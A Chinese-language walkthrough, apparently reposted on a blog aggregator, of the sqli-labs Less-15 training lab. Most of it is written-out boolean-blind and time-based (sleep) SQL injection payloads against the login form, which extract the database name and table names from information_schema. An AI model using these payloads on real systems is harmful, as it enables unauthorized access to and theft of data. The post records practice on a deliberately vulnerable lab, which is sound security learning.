sqli-labs靶场Less-15

2023-10-30

1、访问首页，/Less-15/index.php，这里的传参点是表单中的uname、passwd

判断是否是数字形传参
判断是否有单引号闭合
判断是否是双引号闭合
判断是否单引号+括号闭合
判断是否是双引号+括号闭合

如果以上都不适：哪以上规则都同时加上sleep测试一遍，看是不是存在延时注入

分析：这里同时存在布尔型（延时）注入，哪这里可以使用盲注或延时盲注来做这个题。

2、使用盲注获取数据库长度

-- 盲注
admin' and length(database())=8-- qwe-- qwe

-- 延时盲注
admin' and if(length(database())=8,sleep(10),0)-- qwe

3、获取数据库名称

-- 盲注判断数据库第一个字符
admin' and ascii(substr(database(),1,1))=115-- qwe

-- 延时盲注判断数据库第一个字符
admin' and if(ascii(substr(database(),1,1))=115,sleep(10),0)-- qwe

备注：这里数据库名称一共是8位，我这用一位做演示，其余7位按顺序一位位截取判断即可

4、获取表名长度

-- 盲注查询表名长度
admin' and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5-- qwe

-- 延时盲注查询表名长度
admin' and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(10),0)-- qwe

5、获取表名称

-- 通过盲注判断表名
admin' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117-- qwe

-- 通过延时盲注判断表名
admin' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),0)-- qwe

...获取字段名，都采用同样的操作即可，语法一样，只是查询语句变一下而己，就不一一尝试了，这里主要是让自己熟悉盲注与延时盲注的语法。

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

渗透测试

web安全

sqli-labs靶场Less-15 的相关文章

牛顿迭代法解非线性方程组（附C++代码）

目录一公式介绍二应用环境三 C 代码实例说明 C 编译环境 C 代码运行结果特别注意解决方法一公式介绍牛顿迭代法基本公式迭代出面对非线性方程组问题将上式变形其中为注这里面的不再时代表一个值而是代表关于变
SpringBoot---@DeleteMapping

DeleteMapping 在编写代码时引用了 DeleteMapping 注解 DeleteMapping value remove courseNo public String remove PathVariable courseNo
linux中shell脚本命令使用详解

文章目录一普通用户和超级用户二关于系统的操作三关于文件操作 3 1 ls显示文件 3 2 cd进出目录 3 3 mkdir创建目录 3 4 touch创建文件 3 5 cp复制命令 3 6 rm删除命令 3 7 cat命令 3
注意力机制：CA - Coordinate Attention for Efficient Mobile Network Design（文末附代码）

注意力机制 CA Coordinate Attention for Efficient Mobile Network Design 摘要引言具体而言优势相关工作 Mobile Network 架构注意力机制 Coordinate
java 正则表达式检测数学公式是否正确_java 正则表达式检测数学公式是否正

java 正则表达式检测数学公式是否正 2021 02 05 13 33 36 简介 java中正则表达式基本用法的使用 1 Test01 java 使用正则表达式使代码变得非常简洁 2 TestMatcher01 java Matche
IBM近期扩充Watson认知API服务

本文转载至 http www infoq com cn news 2016 03 watson cognitive apis 近期 IBM对Watson认知API服务进行了扩充新增了情绪和语调分析API的测试版本 Watson的情绪分析A
Flutter 组件抽取：验证码输入功能（CodeInputContainer）

简介验证码输入框可选需要输入的验证码个数输入达指定个数后自动回调效果范例 class TestPageState extends State
【通信原理】七、数字带通传输系统

文章目录一 2ASK振幅键控 2ASK振幅键控原理 2ASK包络检波 2ASK相干解调法二 2FSK频移键控过零点检测解调法三 2PSK相移键控四 2DPSK差分相移键控差分相干解调相位比较法五已调信号功率谱密度六抗噪
VB.Net正则表达式大全（3）

深入浅出之正则表达式注 JanGoyvaerts为RegexBuddy写的教程的译文前言半年前我对正则表达式产生了兴趣在网上查找过不少资料看过不少的教程最后在使用一个正则表达式工具RegexBuddy时发现他的教程写的非常好可
IDEA插件之输入法自动切换【Smart Input Source】

MAC系统推荐快捷键针对输入切换无需快捷键但是在某些场景下比如Git Diff的时候可能存在自动跳转到源文件的情况这种时候需要手动关闭自动切换功能给作者提了个建议对这种场景进行优化建议使用的快捷键 C代表关闭 O代表打开介绍解
量子云计算：实现自我验证！

量子云计算实现自我验证背景即使对于世界上最强大的经典计算机来说有些极度复杂的计算仍然需要花费漫长的时间可是从理论上说量子计算机却可以完全胜任非常复杂的计算任务原因是不同于经典计算机的比特位量子计算机拥有量子位经典二进
人工智能讲师专家老师叶梓人工智能讲师之机器学习与深度学习-34

接上一篇系列博文人工智能讲师叶梓关于人机器学习与深度学习入门课程课件为系列博文更多课程及老师资料可点击个人主页最小二乘法的示意图 R语言实现的一元线性回归一元回归的PYTHON实现 IMPORT PANDAS AS PD f

随机推荐

前端实现csv文件的解析预览、上传、下载

最近遇到了一些关于csv文件的上传下载解析预览删除的需求因为之前没有做过尤其是关于csv的解析并预览于是记录一下上传关于上传绝大部分的选择都是通过第三方的OSS进行存储比如阿里云的这个其实没什么难度有文档可以看对于
ServiceLoader SPI的简单认知

写了这么长时间的代码竟然没有用过jdk SPI的ServiceLoader 深表遗憾为什么写这个因为在看Sentinel配置代码的时候看到了这个挺好用的用法在jar包中 resources 中建立 META INF servi
Java客户端连接不了安装在CentOS7上的redis解决方案

今天初试了使用Java Redisson 客户端连接安装在CentOS上的redis 发现一直连接不了报错信息如下 Exception in thread main com lambdaworks redis RedisException
HTML教程

文章目录 HTML 1 HTML 概述 2 第一个 HTML 代码 3 HTML 标签分类 4 HTML基本标签 4 1 结构标签 4 2 排版标签 4 3 块标签和行内标签 4 4 文本标签已过时 4 5 文本格式标签 4 6 标题标签
mybatis TypeHandler详解

1 TypeHandler概念 TypeHandler 类型转换器在mybatis中用于实现java类型和JDBC类型的相互转换 mybatis使用prepareStatement来进行参数设置的时候需要通过typeHandler将传入
简单的LVGL按键例程

以下是一个简单的LVGL按键例程使用LVGL的按键事件来处理按钮的单击和长按操作 include lvgl lvgl h void btn click action lv obj t obj 处理按钮单击事件 void btn long
ASP.NET -- WebForm -- ScriptManager 类

ASP NET WebForm ScriptManager 类通过 ScriptManager 可注册随后将作为页面一部分呈现的脚本 1 注册并立即执行脚本 RegisterStartupScript 方法例在ASP NET中实现和
构建Java Web应用实验

1 创建负责下载WAR文件的镜像 1 创建一个目录fetcher 保存相关的配置信息和内容在后输入mkdir fetcher cd fetcher命令然后按Enter键创建fetcher目录并进入该目录示例代码如下 root xi
知识追踪实战：lstm+ Multi-head Attention注意力机制的学生做题成绩预测实战

项目视频讲解知识追踪实战 lstm Multi head Attention注意力机制的学生做题成绩预测实战哔哩哔哩 bilibili from collections import Counter import torch from
小程序蓝牙亲身总结

问题 1 小程序蓝牙搜索能不能搜到手机设备 2 如何判断蓝牙是否打开 3 搜索指定设备 4 开发者工具和 Android 上获取到的deviceId为设备 MAC 地址 iOS 上则为设备 uuid 因此deviceId不能硬编码到代码中
前端框架（一）zTree 从数据库中动态加载树形菜单

这几天做动态菜单用到了这个插件目前用的很广泛的一个开源框架最新发布的QUI框架就是用这个插件开发的菜单部分因此还是很值得深入研究和学习通过使用感觉功能很丰富好多函数不用自己开发和编写官网上有很详尽的API可以参考用着算顺手但学
ASP.NET 与ASP.NET Core区别--概念及特征比对

随着 NET的发展 NET Core对跨平台支持得越来越好 ASP NET Core能运行在Windows macOS 或 Linux 上这就意味着ASP NET Core开发的网站可以在除了Windows之外的平台运行而且ASP N
每天读一遍，不久你就会变

在平凡枯燥简单的工作中做无可取代的人再烦也别忘记微笑再急也要注意语气再苦也别忘坚持再累也要爱自己低调做人你会一次比一次稳健高调做事你会一次比一次优秀成功的时候不要忘记过去失败的时候不要忘记还有未来有望得到的要
cadence allegro番外：制作含热风焊盘、反焊盘的过孔

前言需要先参考下列文章 padstack editor制作过孔 cadence allegro番外制作flash焊盘在以上文章中已经制作了一个可用于两层板的过孔但是在多层板中过孔是需要链接或避让负电层的因此需要在过孔中添加热风
麒麟v10 curl报错：SSLv3_client_method version OPENSSL_1_1_0 not define

curl及yum大致错误 usr bin cmake3 relocation error usr lib64 libcurl so 4 symbol SSLv3 client method version OPENSSL 1 1 0 not
【STM32 学习】电源解析（VCC、VDD、VREF+、VBAT）

VCC 电源电压 GND 电源供电负电压通常接地 VDD 模块工作正电压 VSS 模块工作负电压 VREF ADC参考正电压 VREF ADC参考负电压 VBAT 电池或其他电源供电 VDDA 模拟供电正电压 VSSA 模拟供电负电压一
c++11:动态内存与智能指针

为了更容易同时也更安全地使用动态内存新的标准库提供了两种智能指针 smart pointer 类型来管理动态对象智能指针的行为类似常规指针重要的区别是它负责自动释放所指向的对象新标准库提供的这两种智能指针的区别在于管理底层指针的
CV::Mat数据拷贝 memcpy 踩坑

1 cv mat 初始化 cv Mat img1 h w CV 8UC3 cv Mat img1 h w CV 8UC3 data 一般cv mat 初始化后数据内存 data 段都是连续的可以用isContinuous 函数判断存储是否
Git克隆、拉取最新代码、上传代码到远程仓库

文章目录工作区暂存区版本库 1 提交代码到仓库 2 pull拉取最新代码 3 克隆拉取代码解决冲突 4 git 关联仓库并上传代码 5 关联已有仓库并提交代码 6 git记住某个仓库的账号密码工作区暂存区版本库工作区就是
sqli-labs靶场Less-15

1 访问首页 Less 15 index php 这里的传参点是表单中的uname passwd 判断是否是数字形传参判断是否有单引号闭合判断是否是双引号闭合判断是否单引号括号闭合判断是否是双引号括号闭合如果以上都不适哪以上

sqli-labs靶场Less-15

sqli-labs靶场Less-15 的相关文章

随机推荐

热门标签